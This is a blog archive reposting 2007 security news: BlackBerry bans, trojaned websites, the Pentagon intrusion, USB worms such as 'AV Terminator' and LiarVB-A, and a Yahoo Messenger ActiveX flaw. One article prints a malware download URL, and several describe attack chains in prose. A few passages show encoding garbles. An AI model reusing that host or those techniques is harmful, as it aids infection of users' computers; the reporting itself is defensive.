(法新社舊金山二十三日電) 維護隱私權人士警告指出,改變以手持行動通訊裝置收發電子郵件、打電話、以及搜尋網路資料,等於是為私家偵探和間諜創造了一個挖掘不盡的全球大金礦。

法國「世界報」報導,法國政府官員被建議不要使用「黑莓機」,因為美國國家安全局可能會從電子郵件中截取情報。

美國電子資料保密中心資深顧問恩古告訴法新社:「一個政府能說無線資料不太安全,使用時要格外小心,這是很好的事」。

恩古指出:「大家必須對此有所了解,我們知道多個政府機構,像是聯邦調查局,都曾未獲法院授權就尋搜情報,而國安局更表示無需核准」。

黑莓機製造廠商加拿大無線通訊公司(ResearchIn Motion)駁斥法國政府的擔心是無必要的反應,並表示,指稱美國間諜能窺探其網路是「有兩年之久,老掉牙的謠言」。

加拿大無線通訊公司表示:「沒有人,包括加拿大無線通訊公司本身也一樣,有能力檢視以黑莓機發送的任何數據資料,因為所有數據都是加密的」。

「電子郵件來源不能被追蹤,內容也無法分析」。

根據加拿大無線通訊公司的資料,全球大約有七十萬名政府人員使用黑莓機。

歐洲國家官員長久以來懷疑美國領導一項代號「梯隊」的計畫,這項計畫於冷戰時設立,目的在攔截並還原電子訊息,但在共產鐵幕崩解後,這項計畫就被用來窺探歐洲國家情報。

加拿大無線通訊公司駁斥相關說法為「不實和誤導」;但隱私權保護人士和駭客高手認為,隨著科技和時間演進,無線傳輸訊息被攔截破解,只是早晚的事。


jason0936 發表在 痞客邦 留言(0) 人氣()

防範惡意程式入侵 網站管理加倍小心

http://www.bcc.com.tw

更新日期:2007/06/23 09:00
「防範惡意程式入侵 網站管理加倍小心」(張德厚報導)

調查報告顯示,台灣網路上惡意程式氾濫,平均每天就發生5件網路駭客入侵事件,台灣已經成為亞洲最毒國家的第二名,僅次於中國大陸。資訊安全公司Tipping Point與法務部調查局、刑事局等單位,共同針對國內網路安全進行觀察,發現從2000年開始,藉由台灣網域「.com.tw」而發生的駭客攻擊超過12,000次,平均每天就發生5件。駭客入侵的對象包含企業網站、政府網站以及教育單位;觀察也發現,從過濾器中所發現的病毒,在今年的一月初,更發生一天有超過一百萬的數量。駭客的攻擊手法,已經不像以往用病毒來大規模癱瘓全球的電腦,而開始針對特定的行業或對象來進行入侵。例如銀行、保險、證券等金融業的網站,都經常成為駭客入侵的對象,即使是一般網站,許多也暗藏木馬程式,台灣網路已經成為亞洲最毒國家的第二名,僅次於中國大陸。法務部調查局資安鑑識科調查員錢世傑:『這幾年比較嚴重的情況是,木馬程式比較氾濫,透過木馬程式的散布,所以在國內的很多電腦中都被植入傀儡,也就是這些電腦都可以被操控在駭客及犯罪集團的手中。』

◎資安危機 網頁惡意連結最嚴重資安公司進一步指出,台灣90%的銀行都曾經被駭客以各種方式入侵過,可見得資安問題的嚴重性。不過許多企業由於預算的關係,即使被駭客入侵過,但是還是不願意投資防護設備與人力,甚至還有單一企業被駭客入侵高達82次的紀錄。錢世傑:『譬如駭客會用一種手法叫SQL Injection,他是先入侵資料庫,然後透過資料庫去變更你網頁的內容,很多大陸的駭客很容易就入侵資料庫,透過一個程式很容易就把你的網頁改過來了,改過之後你的網頁也變成了釣魚網站,任何來到你的網頁瀏覽的民眾,很可能就經由你的網頁再連到一些惡意網頁被植入木馬。』這些被入侵竄改的網頁,在外觀上完全看不出有什麼不同,使用者以為在瀏覽一般正常的網站,沒想到不知不覺就暗中被連結到另一個惡意網頁而被植入木馬程式,個人帳戶密碼等機資料也因此被竊取取;因為木馬程式特徵會一再變化,一般的防毒軟體能夠預防的效果也有限。

◎阻止惡意程式 Google提出警示而為防止網友瀏覽網頁時暗中被植入惡意程式,搜尋引擎Google就對潛藏惡意程式的網站標示警語,提醒網友不要進入。經常上網的網友可能會發現,使用搜尋引擎Google找資料時,有些搜尋結果所列出的網站下面,會出現一行警語寫到「這個網站可能會損害您的電腦」,這其實是由Google的「阻止惡意程式組織」(StopBadware.org)所提供的惡意程式提醒服務。根據Google的統計,全球至少有100萬個網頁含有會「隱匿強迫下載」的惡意程式。而Google發現被惡意程式入侵的網站,就會在搜尋結果中標示警語,並封鎖連結,若網友強制點選進入,Google會警告「風險需自行承擔」。而對於遭入侵的網站,Google也提供了通知的服務,只要網站使用Google的「網站管理員工具」,提報網站的網址給Google,一旦網站遭受惡意程式攻擊時,Google就會透過電子郵件通知網站管理員,並且做出如何解決的建議。而如果網站本身已經移除了入侵的惡意程式,也可以通知Google要求移除警示。

◎拒絕惡意程式 網站加強維護除了被動的仰賴搜尋引擎所提供的警示,網站的管理者又該如何主動的預防惡意程式攻擊呢?資安公司表示,駭客之所以能入侵網站,通常都是網站的伺服器設定上出現漏洞,或是修補程式沒有安裝,使得駭客入侵取得了控制權限,進而竄改網頁、加入惡意連結。由於駭客不希望任何人發現他已經入侵成功了,所以網站在運作及外觀上不會出現任何變化,但是卻會導引網友到其它地方下載惡意程式。

資安公司指出,網站管理者平時在進行維護工作時,必須要加留意是否出現漏洞,仔細檢查是否有不該存在的對外連結,才能及早發現是否有惡意程式植入。賽門鐵克技術總監王岳忠:『檢查的時候,不能只看網頁該有的東西通通有就好了,要去檢查網頁是不是有一些多的、不該有的,除了看網頁顯示出來的結果之外,還要去看看網站是否被竄改。』而在預防方面,王岳忠指出,任何防毒措施,都是在攻擊出來之後,才會有相對的解決方案,期間還是可能讓駭客有可趁之機,由於網站用的伺服器其實工作項目很單純,最好的防護方法,建議可以「鎖定」的方式進行主機系統防護,網站的安全就可以大幅提高。

王岳忠:『你去列出來,這台伺服器,他能做哪些事情,只要不是我允許的事情,全部不能做,這個方法會遠比要用最新的防護,隨時更新要有效。』

jason0936 發表在 痞客邦 留言(0) 人氣()

http://news.sina.com.tw/tech/sinacn/cn/2007-06-22/132038170168.shtml
美國司法部文件洩露XP SP3部分技術細節

北京新浪網 (2007-06-22 13:20)

作者:BlackWing

 又有消息證實了Windows XP SP3的存在,並且微軟也透露了部分SP3將包含哪些更新的細節。對於微軟來說,Windows XP SP3已經不是新聞。並且,隨著Vista的正式推出,Windows XP SP3已經退居幕後。但微軟一直都沒公開證實是否取消Windows XP SP3。

  在美國司法部的法律訴訟案中透露了Vista SP1(Vista SP1)的推出日期。案中顯示微軟計劃在今年年底推出Vista SP1 beta,但目前這個也只是初步估計的日期。與Vista不同,現在Windows XP SP3計劃會在2008年上半年推出。但是微軟原本計劃在2006年就會推出Windows XP SP3,後來宣布延遲到2007,接著再度延遲到2008。

  雖然幾經推遲,Windows XP SP3還是會推出,並且微軟計劃在這個升級中集成IE和Windows Media Player的修改。從美國司法部的文件中得知,微軟已經同意對Windows XP作出修改,修改的方麵包括兩個中間u馦ㄚ~和Windows Live Messenger。Windows Live Messenger的改變已經體現在Windows Live Messenger 8.5 beta中,並且將會集成到公開發布版本中。而IE和Windows Media Player的改變也會在2007年8月提供給用戶,並且微軟正和TC討論如何投遞這些修改版本。有關Windows XP的改動將會整合到Windows XP SP3當中。


jason0936 發表在 痞客邦 留言(0) 人氣()

這..... 嗯........看看吧
http://news.sina.com.tw/tech/sinacn/cn/2007-06-22/160538170213.shtml
微軟:Vista比MacOS X和Linux更安全

北京新浪網 (2007-06-22 16:05)

  [計世網消息](伯牙 編譯) 6月22日消息,國外媒體報導,微軟日前表示,Windows Vista的漏洞遠遠少于Linux和Mac OS X系統。

  微軟安全業務部門可信賴戰略主管傑夫‧瓊斯日前表示,與Linux和Mac OS X等作業系統相比,Windows Vista的安全性要高出很多。

  據悉,瓊斯對Windows Vista、Windows XP、Red Hat Enterprise Linux 4 、Ubuntu 6.06 LTS、Novell Suse Linux Enterprise Desktop 10和Apple OS X等系統進行了比較,結果發現,Vista幾乎在所有領域都要領先于其他系統。

  在安全漏洞的修補效率方面,微軟比蘋果快159%,比 Novell快255%,比 Sun快579%。

  在風險日方面,Windows去年的平均風險日為29天,而Mac OS X為46 天、SuSE Linux Enterprise為 74天,紅帽子企業Linux為107天,Sun Solaris為 168天。

  對此,賽門鐵克安全回應部門副總工程師阿爾夫雷德‧胡根表示,瓊斯的統計數字比較合理。胡根說:『我們最近的一次互聯網安全威脅報告與瓊斯的資料基本一致』。


jason0936 發表在 痞客邦 留言(0) 人氣()

《生活萬象》又見惡意程式 鑽IE漏洞

更新日期:2007/06/22 09:17 記者:【陳大任】

一隻名為JS_DLOADER.NTJ的惡意程式最近在歐洲造成嚴重災情,單日最高記錄造成六萬台電腦遭殃,單是義大利就有四萬四千台電腦被入侵的惡意程式攻擊發出警訊。

趨勢科技技術顧問簡勝財說,駭客挑選安全防護較不完整的網站,並且植入惡意連結程式HTML_iFrame.CU,當做是擴散的跳板,只要網友點選此網站,電腦即會被連結到另一個IP位址,並植入名為JS_DLOADER.NTJ的惡意程式。此隻惡意程式會利用微軟IE中的MS04-040及MS06-057漏洞入侵電腦,以植入更多可竊取個人機密資料的木馬程式,此被入侵的電腦將被開啟後門,成為駭客散播惡意程式的工具,藉以造成更大規模的感染。


jason0936 發表在 痞客邦 留言(0) 人氣()

怕美國竊密 法國高層官員禁用黑莓機

東森新聞報 更新日期:2007/06/22 10:55 記者:記者詹珝榕/編譯

方便收發電子郵件的黑莓機,遭法國政府禁止總統府及各部會官員使用,以防止美國情報單位攔截政府官員間的簡訊。不過黑莓機廠商表示,黑莓機的加密技術比一般網路銀行還要嚴密,不太可能遭到破解。

黑莓機問世後,成為美國企業中高階主管的熱門配備,但是法國情報部門卻提醒,小心你在收發電子郵件的同時機密資料已經外洩。

法國情報線上雜誌主編指出,「法國資訊安全部門就是負責監督法國政府網路安全性的單位,三年前就建議所有政府員工不要使用PDA,官方所持的理由是,因為這樣容易遭人竊取機密。」

法國政府經過評估後,最近又下令延長18個月前頒布的禁令,總統府以及各部會都不准使用黑莓機,要防範的間諜就是美國國安局。法國世界報報導,黑莓機的資料會經過美國及盟邦英國的伺服器傳輸,讓英美得以輕易取得傳輸的資料。

但是黑莓機廠商否認他們的產品會成為監聽與竊取資料的工具,專家也對法國政府的做法不以為然。法國情報線上雜誌主編說,「我認為私人團體比較會竊取通訊資料,特別是低階的政府通訊,相較之下,要說美國會竊聽每一位法國政府官員,我不認為如此。」

黑莓機具有強大的電子郵件收發功能,掀起一股行動電郵熱,美國尤其風行,但是法國政府卻反其道而行,就有法國公務員私下抱怨,這樣做簡直是把他們打回傳字條的時代。禁了黑莓機,法國政府也在尋找替代裝置,希望解決「燃莓之急」。


jason0936 發表在 痞客邦 留言(0) 人氣()

美國防部遭駭客襲擊 1500台電腦斷網

北京時間6月22日消息,據國外媒體報導,美國國防部官員週四表示,由於遇到了一次網路攻擊,五角大樓被迫對1500台電腦採取斷網措施。
  
五角大樓表示,這次網路網路攻擊發生在週三,但沒有透露更多詳情。

美國國防部長羅伯特•蓋茨(RobertGates)表示,遭到攻擊的電腦系統不久將恢復正常。他表示,雖然每天針對五角大樓的網路攻擊約有數百起,但週三的攻擊對美國國防部的辦公造成了一家影響,一些雇員的電腦斷網後,仍可使用黑莓手機。

蓋茨稱,五角大樓週三檢測到系統侵入現象後,隨後關閉了受影響電腦。在被問及自己電子郵件帳號是否受到影響時,蓋茨回答道,自己平常並不收發電子郵件,因為自己還不太會使用。

[稿源:新浪科技]

米国防総省にサイバー攻撃、コンピュータをオフラインに

国防総省はシステムへの侵入を受けて、1500台のコンピュータをシャットダウンした。
2007年06月22日 09時47分 更新

ワシントン(Associated Press)

 米国防総省が、サイバー攻撃を受けて1500台のコンピュータをオフラインにした。同省が6月21日に明らかにした。

 この攻撃は20日に発生した。詳しい情報はほとんど公開されていないが、国防長官ロバート・ゲーツ氏は、コンピュータシステムはすぐに復旧すると話した。

 ゲーツ長官は、国防訴訟は1日に数百件の攻撃を受けていると語り、今回の攻撃は同省の業務に悪影響を与えていないと述べた。省職員はコンピュータが影響を受けても、BlackBerryを使うことができた。

 長官は記者説明会で次のように語った。「当然だが当省は冗長システムを設置している。多少は業務が混乱したり、個人が不便を被ることもあるだろう」

 同省はシステムへの侵入を検知したときにコンピュータをシャットダウンしたと長官は説明した。原因はまだ調査中という。

 ゲーツ長官の電子メールアカウントに影響はあったかとの質問に対し、長官は「電子メールは使っていない。わたしは非常にローテクな人間だ」と答えた。

 国防総省の広報官チトー・ペプラー海軍中佐は、同省のシステムは毎日、さまざまな攻撃を受けていると語る。

 「この脅威の性質は大規模で多様であり、趣味のハッカー、自称サイバー自警団、民族的・イデオロギー的主張を持つさまざまな団体、多国籍組織、国家などが仕掛けている」(同氏)


jason0936 發表在 痞客邦 留言(0) 人氣()

http://www.gmw.cn/content/2007-06/22/content_626938.htm&cid=1113919000&ei=rTF7RonREKayqwPbzdAu
AV終結者”被疑存在人為縱毒

鐘曉軍 發佈時間: 2007-06-22 09:49 光明網

被稱為“安全殺手”的電腦病毒“AV終結者”目前的變種數量已經超過了500餘個,波及用戶超過數10萬。 據介紹,該病毒就像一把鑰匙,將電腦所有的安全防護途徑封鎖,然後將安全之門打開,之後放進來各種各樣的木馬,這些木馬進入之後想拿什麼就拿什麼,而用戶對此毫無知覺。
 
金山毒霸戴光劍反病毒工程師認為“AV終結者”的種種表現以及傳播和作案手段都顯示出其背後集團化、企業化運作的痕跡。

戴光劍介紹說該病毒的整個傳播和作案過程是經過精心策劃的。金山毒霸全球反病毒應急處理中的研發人員一致分析認為該病毒存在兩種傳播管道。即通過移動存放裝置進行傳播,以及通過攻擊企業的伺服器讓掛馬現象在整個企業網路中迅速蔓延。

反病毒工程師分析認為在第一種傳播管道中,病毒的幕後集團操縱或者買通了一部分人將寫好的病毒程式拷貝到U盤或者移動硬碟上,然後到網吧等公共上網場所將這些移動存放裝置插入電腦,而這些公共電腦的使用者就會在一無所知的情況下再通過移動存放裝置將該病毒的傳播範圍進一步擴大。

在第二種傳播管道中,反病毒工程師分析認為病毒的幕後集團進行了很好的分工,一部分人負責攻擊企業的伺服器,攻擊成功後另一部分人直接在伺服器上配置利用ANI漏洞傳播的病毒掛馬,還有一部分人將這種掛馬行為擴大到該伺服器託管機房中的其他伺服器上。

戴光劍介紹說“AV終結者”病毒的目的很明確,就是將使用者的系統徹底變成“聾啞人”,繼而給一切的木馬病毒打開大門,實施各種作案行為。

 “AV終結者”先將用戶的windows防火牆、自動更新、殺毒軟體等全部幹掉,並使一切含有“金山毒霸”、“卡巴斯基”、“瑞星”、“江民”、“360”、“金山社區”“殺毒”、“專殺”等敏感字串的軟體和進程以及與此有關的網站全部無法打開。在使用者的系統徹底變成“聾啞人”人之後,“AV終結者”病毒就會在使用者毫無覺察的情況下從諸如
http://head.bodyhtml.biz/update/update.txt等地址下載數百種盜號木馬、廣告木馬、風險程式......這些新下載的病毒目的不一,有盜竊QQ號碼的、盜取網遊帳號和裝備的、盜取網銀帳號的等等。這些木馬的製作者或者下游的購買者再拿走這個盜號鏈條上的自己所需要或者感興趣的任何東西。據此前國家電腦網路應急處理中心統計,包括這些木馬在內的整個木馬黑色產業鏈條的年產值已超2.38億元人民幣,造成的損失則超過76億元。

    “AV終結者”病毒從傳播到實施作案,任何一個階段都採用了多種不同種類的病毒和攻擊手段,任務的複雜度超過了以前出現的所有病毒。同時從戴光劍多年的從業經驗來分析,該病毒目的的達成背後沒有一個計畫周密的公司或集團顯然是無法完成的。“AV終結者”病毒的氾濫與“熊貓燒香”如出一轍,只是運作這個利益鏈的盜號集團,比“熊貓燒香”的作者李俊更加小心謹慎,手法也更隱晦。

    戴光劍介紹說在這個集團人為放毒的過程中,也會留下某些蛛絲馬跡。這些木馬的下載伺服器是整個利益鏈條中的聚合器,擁有或控制這些網站的人就是直接或間接受益人。通過這些下載位址順藤摸瓜,就有可能揪出幕後“黑老大”。 


jason0936 發表在 痞客邦 留言(0) 人氣()

病毒U盤傳播泛濫 殺毒U盤成安全廠商又一戰場

北京新浪網 (2007-06-21 17:20)

CNET科技資訊網 6月21日北京報導 近期,通過U盤傳播的病毒已呈現蔓延之勢。一個名為"AV終結者"(江民稱U盤寄生蟲,瑞星名為帕蟲)的病毒又在安全市場掀起一陣波瀾。

江民反病毒中心監測,"U盤寄生蟲"病毒本周重新登上病毒排行榜榜首,成為互聯網面臨重大威脅之一。金山統計,"AV終結者"波及用戶數量已經多達10萬。而本周另一傳播較廣泛的病毒"隨機8位數"也是通過U盤傳播。

此類病毒都會在移動設備或硬盤根目錄下生成Autorun.inf文件,用戶雙擊盤符即可啟動病毒。除了U盤之外,MP3、MP4、移動硬盤、數碼相機等移動儲存設備無一例外地成為此類病毒的傳播載體。

據悉,國內首例通過U盤傳播的病毒出現在2003年。當年8月3日,江民科技反病毒中心截獲首例通過U盤傳播的"不公平"(Worm/Unfair)病 毒。"不公平"病毒是某大學學生為了抗議在學校實習報名過程中遭到的不公正待遇而編寫,病毒運行後強行向A盤或U盤寫入病毒體,與讀寫軟盤發出聲響不同, 病毒寫入U盤時悄無聲息,悄悄潛伏,危害更大。

U盤病毒的進一步傳播從2006年上半年開始,由於其時U盤已經廣泛應用,大部分電腦用戶通過U盤進行資料互換,多數人在U盤插入電腦前沒有進行病毒掃描,造成了U盤病毒的蔓延。

進入2007年,"熊貓燒香"等重大病毒紛紛把U盤作為主要傳播途徑,越來越多的電腦用戶因為不當使用U盤感染病毒,國家電腦病毒應急中心在2月份為此專門發出"當心U盤傳播病毒"的重大病毒預警。

據介紹,不同的U盤病毒表現症狀不盡相同。多數木馬類型的U盤病毒並沒有明顯症狀,如果不仔細查看或殺毒,普通用戶根本感覺不到病毒的存在。也有一些U 盤病毒發作後的特徵十分明顯,如"熊貓燒香"感染後會使電腦中的所有EXE可執行文件變成"熊貓"圖案,而"Word文檔殺手"則沒有這麼"善良",如果 電腦用戶將感染該病毒的U盤插入電腦,病毒會將Office用戶的WORD文檔逐個刪除,所有windows版本用戶無一幸免。

各大殺毒軟件廠商都接到用戶求助,反映在偶爾一次插入U盤拷貝資料後,電腦出現異常或死機,以及資料被破壞、刪除等症狀,受害者的數量目前正在逐漸上升,江民病毒預警中心的資料顯示,"U盤寄生蟲"僅一周的時間就已感染了16712台電腦。


jason0936 發表在 痞客邦 留言(0) 人氣()

網路設施和數字家庭將是黑客攻擊目標

北京新浪網 (2007-06-21 16:36)

McAfee的AVERT實驗室星期二稱,尋求新的攻擊領域的在線犯罪分子在今後幾年里將在網路基礎設施和數字家庭方面找到綠地。McAfee在舊金山舉行的新聞發布會上公布了2007年主要安全趨勢。McAfee稱,釣魚攻擊、垃圾郵件、殭尸網路和rootkits(根工具包)等眾所周知的問題正在繼續增長。
  
但是,在未來幾年里,新的領域將成為人們擔心的主要問題。McAfee殺毒應急反應小組(AVERT)實驗室的病毒研究經理Craig Schmugar說,從短期看,網路基礎設施將是人們擔心的問題。從長期看,人們擔心的將是數字娛樂。
  
Schmugar指出,最近的Windows域名伺服器安全漏洞就是一個很好的例子。這些伺服器是網路基礎設施的重要部分,用來把用戶輸入的域名轉換為識別網路上電腦的IP位址。
  
這個安全漏洞曾在少量的網路攻擊中被利用。微軟在攻擊開始之後于今年4月份修複了域名伺服器的安全漏洞。
McAfee還預測說,隨著電腦用戶適應了隨處連接到無線網路,黑客將把重點放在Wi-Fi攻擊方面。Schmugar說,我們還沒有聽說過實際發生的攻擊。但是,這可能會成為一個大問題,特別是在有城市Wi-Fi網路的地方。

一些安全專家警告稱,公共Wi-Fi網路可能被用來建立『中間人』攻擊。攻擊者能夠建立一個惡意無線網路,然後攔截受害者與他們連接的網路伺服器之間的通訊。Schmugar預測,數字家庭最終將吸引家庭入侵者。隨著消費者適應了下載和播放電影和遊戲然後在家庭娛樂電腦上播放,這將成為黑客攻擊的一種新的方式。

  McAfee稱,網站視頻已經受到了攻擊。今年3月,該公司報告稱,法國Mamasaid樂隊的MySpace網頁已經受到了感染,正在下載隱藏在一個QuickTime文件中的惡意代碼。


jason0936 發表在 痞客邦 留言(0) 人氣()

瑞典反思網路資訊過度披露

北京新浪網 (2007-06-21 10:21)

你的老板賺多少?女兒的男朋友欠債嗎?
在瑞典,人們只要上網就能把這些事情查個一清二楚。

據報導,在瑞典,收入、婚姻 狀況和受教育程度等個人資訊長期以來都相當透明,而現在如信用卡是否透支、哪筆賬尚未支付等個人交易的細節也能在互聯網上輕易查到,查詢者甚至一度可以匿名享受免費服務,這引起了瑞典公眾的不滿。瑞典有關部門最近表示,瑞典的資訊透明法被濫用,並要求相關網站對類似查詢進行限制。


jason0936 發表在 痞客邦 留言(0) 人氣()

http://www.bcc.com.tw/news/newsview.asp?cde=483357
Google個人化首頁 挑戰傳統入口網站

【2007/06/21 18:13 報導 】   

  搜群引擎Google今天(6/21)宣布在台灣地區推出了領先全球的個人化首頁「iGoogle」,除了提供即時新聞、熱門關鍵字、熱門影片等內容外,任何網友所需要的資訊,都可以自行設定在首頁的頁面中,讓每一個人都可擁有獨一無二的首頁內容。(張德厚報導)

Google 以web2.0的概念,推出了台灣獨有的客製化首頁「iGoogle」台灣版(www.google.com.tw/ig),除了Google原有的搜尋功能之外,還加入了如熱門關鍵字、熱門影片、熱門照片排行榜等功能,並提供台灣各家新聞網站的即時新聞。Google台灣工程研究所簡立鋒博士指出, Google台灣新首頁完全是由台灣工程師所設計,所以領先全球率先推出。簡立鋒:『它最重要的特色有兩個部分,一個是本地化,針對台灣的使用者的很多習慣,做一些很本地化的特色,例如即時新聞以及熱門查詢,還有一個部分就是個人化,可以很容易的去調整、迎合個人的興趣,去設計自己的首頁。』

iGoogle 最重要的特色是,使用者可以自行編排首頁的內容,舉凡股市、翻譯、氣象、藝文、地圖等任何網友想要的內容,還有上萬種網路小工具,以及過去加在「我的最愛」裡的網頁、網站,都可以無上限的自行設定到iGoogle首頁的頁面中,例如喜歡看網路影片的人,就可以把YouTube直接放在首頁中,而且還可以依自己的喜好,上下左右任意移動在首頁中的位置。使用者只要以Google或Gmail的帳號登入,隨時隨地都可擁有獨一無二的iGoogle首頁內容。

iGoogle整個頁面就幾乎就如同入口網站一般,但是完全沒有任何廣告視窗,對於台灣現有各家入口網站的市場影響,未來也值得觀察。


jason0936 發表在 痞客邦 留言(0) 人氣()

空軍屏東基地傳機密外洩 空軍:無重大危害

 中央通訊社 更新日期:2007/06/19 15:49 http:/www.cna.com.tw/

(中 央社記者陳亦偉台北十九日電)有報載空軍四三九聯隊一名簡姓中尉飛行官將公務資料帶回家,以家中電腦處理,導致多項機密資料遭竊;空軍司令部今天表示,本 案已由空軍專案查處管控中,經初步比對目標資料,多為一般性訓練任務簡報資料,對國軍無重大危害,但空軍仍對簡員記過一次。

根據蘋果日報今天報導,簡姓中尉上個月以抽取式硬碟將公務資料從營區複製後帶回家處理,但因個人電腦遭木馬程式感染,導致包括國軍年度重要演訓「漢光二十三號」資料、飛行前任務提示等十多種機密文件,甚至連機密等級相當高的電戰機資料外洩。

空軍司令部今天表示,經初步鑑定比對案內目標資料,發現外洩多為一般性訓練任務簡報資料,並非主要執行計畫,對全軍性各項戰演訓任務並無重大危害,也無涉機密等級與機密屬性,空軍已責由該基地成立緊急應變小組,逐一清查單位內所有公務電腦,以避免遭感染植入惡意程式。

空軍已對簡員依資訊作業管理懲處標準規定核予記過一次處分,並將本事件做為案例宣導,重申嚴禁公務家辦,以確保整體資訊安全。960619


jason0936 發表在 痞客邦 留言(0) 人氣()

http://www.sophos.com/pressoffice/news/articles/2007/06/liarvba.html

USB flash drive worm spreads information about AIDS
LiarVB-A worm infects removable memory sticks

Sophos, a world leader in IT security and control, has discovered a worm which spreads by copying itself onto removable drives such as USB flash drives, in an attempt to spread information about AIDS and HIV.

The W32/LiarVB-A worm hunts for removable drives such as floppy disks and USB memory sticks (as well as spreading via network shares), and then creates a hidden file called autorun.inf to ensure a copy of the worm is run the next time it is connected to a Windows PC. Once it has infected a system it drops an HTML file containing a message about AIDS and HIV to the user's drive.


The worm drops an HTML file containing a message about AIDS.

"Much of the malware we see in SophosLabs is designed to generate income for the hackers. The LiarVB-A worm is different in that respect - it appears that the motive was to spread information about AIDS instead," said Graham Cluley, senior technology consultant for Sophos. "Even though the hacker responsible for this worm wasn't set on filling his pockets with cash, and may have felt that he was spreading an important message, they are still breaking the law. In the future we might see more graffiti-style malware being written on behalf of political, religious and other groups looking for a soapbox to broadcast their opinions."

At the bottom of the HTML file there is a marquee message in white writing on a pink background. The message which scrolls from right to left reads as follows:

This file Doesn't make harmful change to your computer. This File is NOT DANGEROUS for your Computer and FlashDisk (USB). This File Doesn't Disturb any Data or Files on your computer and FlashDisk (USB). So Dont be affraid, and Be Happy !

 
A scrolling message displayed at the bottom of the HTM file claims that the worm causes no harm.

"It's nonsense to say that this worm doesn't harm computers - it makes changes to a PC's settings and overwrites files with itself," continued Cluley. "There is no such thing as a useful virus, and companies should be allowed to decide for themselves what code runs on their computers rather than virus writers thinking it's okay to inject whatever code they like into corporate networks."

Last month Sophos warned about another family of worms which targeted flash drives, changing installations of Internet Explorer to say that they were "Hacked by 1BYTE".

Sophos experts advise that users disable the autorun facility of Windows so removable devices such as USB keys and CD ROMs do not automatically launch when they are attached to a PC. Any storage device which is attached to a computer should be checked for virus and other malware before use. Floppy disks, CD ROMs, USB keys, external hard drives and other devices are all capable of carrying malicious code which could infect the computers of innocent users.

Interestingly, the LiarVB-A worm is not the first piece of malware to be associated with information about AIDS. In 1989, Dr Joseph Popp distributed an AIDS information floppy disk to more than 20,000 people. The Trojan horse program on the floppy disk would trash users' disks if they did not send money to a rented post office box in Panama. Popp's creation is considered one of the very first examples of ransomware.

Sophos recommends companies automatically update their corporate virus protection, and defend their users with a consolidated solution to defend against the threats of viruses, spyware, hackers and spam.


jason0936 發表在 痞客邦 留言(0) 人氣()

http://tw.news.yahoo.com/article/url/d/a/070620/2/g4ub.html
網頁攻擊病毒來勢兇 趨勢示警

更新日期:2007/06/21 07:20 記者:記者何佩儒、王純瑞/台北報導

趨勢科技20日表示,16日在義大利造成超過4.4萬台電腦被入侵的惡意程式攻擊發出警訊,此惡意攻擊已在歐洲及美國漫延,亞洲則有日本及大陸遭受波及,預估將向其他亞洲國家快速散播,趨勢科技籲請台灣網友千萬提高警覺。

趨 勢表示,這個惡意程式,主要是駭客隨機挑選安全防護較不完整的網站做為跳板,在此類網站中植入惡意連結程式HTML_iFrame.CU,一旦網友點選此 網站,電腦即會被連結另一個IP位址,並植入名為JS_DLOADER.NTJ的惡意程式,再利用微軟瀏覽器IE中的程式弱點入侵電腦,以植入更多可竊取 個人機密資料的木馬程式。除了個人資料外洩,也會成為駭客散播惡意程式的工具。

趨勢科技資深技術顧問簡勝財表示,此類型病毒攻擊手法為多層 次攻擊,不僅在第一層遭植入惡意程式的網站並無特殊的畫面或現象,在個人電腦被轉接至其它網址下載惡意程式後再植入其它惡意程式的掩護下,而受感染的個人 電腦不會有如當機或電腦速度變慢的中毒症狀,所以網友較難察覺是否遭攻擊。


jason0936 發表在 痞客邦 留言(0) 人氣()

微軟再曝高危漏洞 木馬病毒可隨意種植

北京新浪網 (2007-06-20 10:51)

  本報訊 (記者 王建紅) 近日,微軟一並發布多個系統漏洞補丁。據了解,其中部分漏洞的危害性不亞于前一段時期鬧得沸沸揚揚的『微軟ANI滑鼠指標』漏洞。而『ANI滑鼠指標』漏洞是微軟歷史上危害最大,影響面最廣的高危漏洞之一。

   據360安全專家介紹,此次發布的漏洞補丁,其中一個為系統API級的漏洞,與『ANI滑鼠指標』漏洞同屬一個危險級別。無論用戶使用的是IE6、 IE7,還是Firefox、Opera等瀏覽器,只要攻擊者在網頁中加一段js腳本,調用這個漏洞,即可在你訪問該網頁的時候,隨意在你機器上種植各種 木馬和後門程式。其危害性之大可見一斑。

  另外,此次微軟發布的漏洞補丁將捆綁WGA(微軟正版驗証)一道更新。據專家介紹,由於安裝 WGA(微軟正版驗証)補丁後,任何不通過驗証的電腦,將會被拒絕除了劃定為『系統關鍵安全更新』外的其他一切系統更新以及被拒絕從微軟網站下載軟件。這 種方式將給盜版用戶
更新帶來一定的困難。

  360安全中心提醒廣大用戶及時更新360安全衛士版本,檢查自己電腦是否已經感染木馬病毒,並使用360安全衛士修複系統漏洞功能升級微軟漏洞補丁,及時修補漏洞,遠離木馬、後門等惡意程式的危害。


jason0936 發表在 痞客邦 留言(0) 人氣()

是的YAHOO!Messenger又出包了


在2007/6/8 以前的Yahoo!Messenger
所提供的視訊與照片共享功能Yahoo! Webcam image upload
所使用的
ywcupl.dll ,出現阻斷瀏覽器的相關弱點。

解決方式,是的再次升級吧!

JVNVU#949817
Yahoo! Messenger
Yahoo! Webcam image upload ActiveX コントロールにバッファオーバーフローの脆弱性

Yahoo! Messenger に含まれる Yahoo! Webcam image upload ActiveX コントロールには、バッファオーバーフローの脆弱性が存在します。

·         200768日以前にダウンロードされた Windows Yahoo! Messenger

Yahoo Messenger のコンポーネントである Yahoo! Webcam はネットワークに接続されたウェブカメラを使用してユーザ同士でチャットを行なうソフトウェアです。このソフトウェアに含まれる Yahoo! Webcam image upload ywcupl.dll には、スタックバッファオーバーフローの脆弱性が存在します。

細工された html ファイルを閲覧した場合、ユーザの権限でコードを実行されたり、Internet Explorer が強制終了される可能性があります。

ベンダのアップデートを適用する
ベンダの提供する情報を元にアップデートを行なってください。

ベンダ

リンク

Yahoo! Japan

Yahoo!メッセンジャー - お知らせ

Yahoo!

Security Update - Yahoo! Messenger

1.       US-CERT Vulnerability Note VU#949817
Yahoo! Webcam image upload ActiveX control vulnerable to arbitrary code execution


jason0936 發表在 痞客邦 留言(0) 人氣()